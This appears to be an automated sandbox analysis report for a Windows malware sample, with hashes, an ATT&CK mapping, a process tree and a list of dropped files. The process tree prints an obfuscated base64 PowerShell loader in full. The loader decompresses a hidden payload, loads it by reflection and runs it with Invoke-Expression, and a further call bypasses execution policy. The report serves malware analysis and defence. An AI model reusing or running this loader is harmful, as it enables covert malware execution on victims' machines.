c1986d766765fd4c16c15e9de85e591ea441610a9d5cde787783b8a31218ef05

General

Target

3a27951e7112d2ccd1dcf3c25c3338700daeff8603de1ecbed59edb40eb8f8ef.exe
Size

1.4MB
MD5

ab14878a25d1819a833d4d2d709c1837
SHA1

3bab7a4c7248c602b5707eece7a709c46a7a7c9f
SHA256

3a27951e7112d2ccd1dcf3c25c3338700daeff8603de1ecbed59edb40eb8f8ef
SHA512

cbf3a3d0fd29d0e3f84f40219e114bdd3b5eb1ff78a00e12e71bcfceb8d6199c4340306a91d5eb4f220148713fafd7f1ed29d8249096d2dfdcb7b49d8fb22fdc
SSDEEP

24576:xfL5njMnqwtuH8y57g+XV+R2D9r6YtmTq3tAJ97IqGJBDgoKahG1YLyXCKN6hmqq:99gqNHU+F+Ri6Om2dS9UhjcMh1LyXrNJ

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2688	powershell.exe
2596	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeDebugPrivilege	2596	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2780 wrote to memory of 2924	2780	3a27951e7112d2ccd1dcf3c25c3338700daeff8603de1ecbed59edb40eb8f8ef.exe	28
PID 2780 wrote to memory of 2924	2780	3a27951e7112d2ccd1dcf3c25c3338700daeff8603de1ecbed59edb40eb8f8ef.exe	28
PID 2780 wrote to memory of 2924	2780	3a27951e7112d2ccd1dcf3c25c3338700daeff8603de1ecbed59edb40eb8f8ef.exe	28
PID 2780 wrote to memory of 2924	2780	3a27951e7112d2ccd1dcf3c25c3338700daeff8603de1ecbed59edb40eb8f8ef.exe	28
PID 2924 wrote to memory of 2532	2924	wscript.exe	29
PID 2924 wrote to memory of 2532	2924	wscript.exe	29
PID 2924 wrote to memory of 2532	2924	wscript.exe	29
PID 2924 wrote to memory of 2532	2924	wscript.exe	29
PID 2532 wrote to memory of 2688	2532	cmd.exe	31
PID 2532 wrote to memory of 2688	2532	cmd.exe	31
PID 2532 wrote to memory of 2688	2532	cmd.exe	31
PID 2532 wrote to memory of 2688	2532	cmd.exe	31
PID 2532 wrote to memory of 2596	2532	cmd.exe	32
PID 2532 wrote to memory of 2596	2532	cmd.exe	32
PID 2532 wrote to memory of 2596	2532	cmd.exe	32
PID 2532 wrote to memory of 2596	2532	cmd.exe	32

C:\Users\Admin\AppData\Local\Temp\3a27951e7112d2ccd1dcf3c25c3338700daeff8603de1ecbed59edb40eb8f8ef.exe
"C:\Users\Admin\AppData\Local\Temp\3a27951e7112d2ccd1dcf3c25c3338700daeff8603de1ecbed59edb40eb8f8ef.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2780
- C:\Windows\SysWOW64\wscript.exe
  "wscript.exe" "C:\Users\Admin\start.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2924
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\temp.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2532
  - - C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4LDIzOCwyMjQsMjMyLDIyMSwyMzEsMjQ0LDE2OSwxOTIsMjMzLDIzOSwyMzcsMjQ0LDIwMywyMzQsMjI4LDIzMywyMzksMTY5LDE5NiwyMzMsMjQxLDIzNCwyMzAsMjI0LDE2MywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NCwxODIpDQokZGVjb2RlZFN0cmluZyA9IENvbnZlcnQtQXNjaWlUb1N0cmluZyAkZW5jb2RlZEFycmF5DQoNCg0KJGZpbGVQYXRoID0gSm9pbi1QYXRoICRlbnY6VXNlclByb2ZpbGUgIlJlZ0FTTS5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\Admin\RegASM.ps1' -Encoding UTF8"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2688
  - - C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\RegASM.ps1"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2596

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
0952bb3ae63d9165c772909655564678

SHA1
472bee496c31ecba132b925e37cf2a621b0ed22d

SHA256
952521a93950aa2c24fe6251463839a7ce22a036baba45612a7f51f925347b81

SHA512
d604ff89e1accd07f6ed65bd10e235378b6212c7132c01a17ccdfa65db8a9a531b5b26a3ae9bd31534cc47ca99c354e1503382a4dca1f1f77e554407b4e5546c

Download Submit
C:\Users\Admin\RegASM.ps1

Filesize
1KB

MD5
48bdbfaa054c030fc5ea2c3a6e42f21f

SHA1
f5779c79fb0017f4ac3be859741f2c0f0a1f665c

SHA256
f233aa2a231694ab295526d98a95408de3a67ac3bb6fd6668fc0c9eb45a7b90a

SHA512
c3658ee5f194d0250cb51f734f7a5605cf36d8dac58c517a7903c3a9776749b35f7f109b49a359efe041d147a82752daa39b171798c010463296ca8070eae2ad

Download Submit
C:\Users\Admin\start.vbs

Filesize
231B

MD5
abe1dd23ab4c11aae54f1898c780c0b5

SHA1
bb2f974b3e0af2baa40920b475582bfd4fb28001

SHA256
89054e19532a9a62ca3403a8899495bf6f06557ff886b475a04227eb8aba7b12

SHA512
e9ec437a32301078ea69ce2f36dadab68315d5e56d94c4d579d3409ccbe0c9e00c3aed7baa0fa6d656fb8ed23213f4c01fb2d108c1a0ed11c58c76cd00f9a99d

Download Submit
C:\Users\Admin\temp.bat

Filesize
1.7MB

MD5
f628048a8932d77965beb27f00b50470

SHA1
ab0dad241e60cba843c25677ed874a2bf5a53ae8

SHA256
accb96626f0336d483d1f645fae448cb61e090c9a8feec51e31c271088af8000

SHA512
d35dd25441d983aa09cf3c32fd984464bb559caaa8bdc5fcdf626d35e8e21cb8a0fcbf8bcf6d2866112e0969bc03d27c933255aebe493635fa741b11e792081a

Download Submit
memory/2596-19-0x00000000745E0000-0x0000000074B8B000-memory.dmp

Filesize
5.7MB

Download
memory/2596-20-0x0000000002FB0000-0x0000000002FF0000-memory.dmp

Filesize
256KB

Download
memory/2596-21-0x00000000745E0000-0x0000000074B8B000-memory.dmp

Filesize
5.7MB

Download
memory/2596-22-0x0000000002FB0000-0x0000000002FF0000-memory.dmp

Filesize
256KB

Download
memory/2596-25-0x00000000745E0000-0x0000000074B8B000-memory.dmp

Filesize
5.7MB

Download
memory/2596-26-0x00000000745E0000-0x0000000074B8B000-memory.dmp

Filesize
5.7MB

Download
memory/2596-27-0x0000000002FB0000-0x0000000002FF0000-memory.dmp

Filesize
256KB

Download
memory/2688-11-0x0000000002F00000-0x0000000002F40000-memory.dmp

Filesize
256KB

Download
memory/2688-13-0x0000000074630000-0x0000000074BDB000-memory.dmp

Filesize
5.7MB

Download
memory/2688-10-0x0000000074630000-0x0000000074BDB000-memory.dmp

Filesize
5.7MB

Download
memory/2688-9-0x0000000002F00000-0x0000000002F40000-memory.dmp

Filesize
256KB

Download
memory/2688-8-0x0000000074630000-0x0000000074BDB000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing